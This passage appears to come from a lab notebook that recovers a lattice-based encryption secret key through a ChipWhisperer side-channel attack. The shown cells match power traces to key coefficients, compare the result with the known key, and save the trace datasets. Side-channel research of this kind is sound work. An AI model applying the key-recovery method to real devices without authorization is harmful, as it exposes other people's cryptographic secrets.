            MATCH[poly_targeted][coeff_index].append(np.argmin([norm_rounded0, norm_rounded1]))

In [ ]:
# Found secret key
for poly_ in range(K):
    for coeff_, match_path in enumerate(MATCH[poly_]):
        found_polyvec_sk_PKE[poly_][coeff_] = secret_path_dict[repr(match_path)][0]
print("The secret Key found is : ", found_polyvec_sk_PKE)

In [ ]:
if found_polyvec_sk_PKE == polyvec_sk_PKE :
    print(f"No errors, you have correctly guessed the secret key")
else :
    print(f'You did not guess the secret key') 
    cpt_wron_coeffs = 0
    
    for poly_ in range(K):
        for coeff_ in range(N):
            if found_polyvec_sk_PKE[poly_][coeff_] != polyvec_sk_PKE[poly_][coeff_]:
                print(f"found_polyvec_sk_PKE[{poly_}][{coeff_}]:{found_polyvec_sk_PKE[poly_][coeff_]} != polyvec_sk_PKE[{poly_}][{coeff_}]:{polyvec_sk_PKE[poly_][coeff_]}")
                cpt_wron_coeffs += 1
    
    print(f"Number of wrongly guessed coefficients: {cpt_wron_coeffs}")

In [ ]:
# # If you want to save the datasets used for the attack 
# np.savez("datasets_building",
#          dataset_building_rounded0=dataset_building_rounded0, 
#          dataset_building_rounded1=dataset_building_rounded1)

# np.savez(f"datasets_matching",
#          poly0_distinguisher_queries = ATK_TRACES[0], 
#          poly1_distinguisher_queries = ATK_TRACES[1])

In [ ]:
# # If the files were saved, we can load them to check if they are ok
# name_of_file = "datasets_building.npz"
# files = np.load(name_of_file)

# name_files = files.files
# print(f"Files found in {name_of_file}:")
# for name_file in name_files:
#     print(f" - {name_file} containing {files[name_file].shape[0]} traces of {files[name_file].shape[1]} samples each")

# print("")

# name_of_file = "datasets_matching.npz"
# files = np.load(name_of_file)

# name_files = files.files
# print(f"Files found in {name_of_file}:")
# for name_file in name_files:
#     print(f" - {name_file} containing {files[name_file].shape[0]} traces of {files[name_file].shape[1]} samples each")


In [ ]:
## """Disconnect the ChipWhisperer if needed """ 
# disconnect_cw()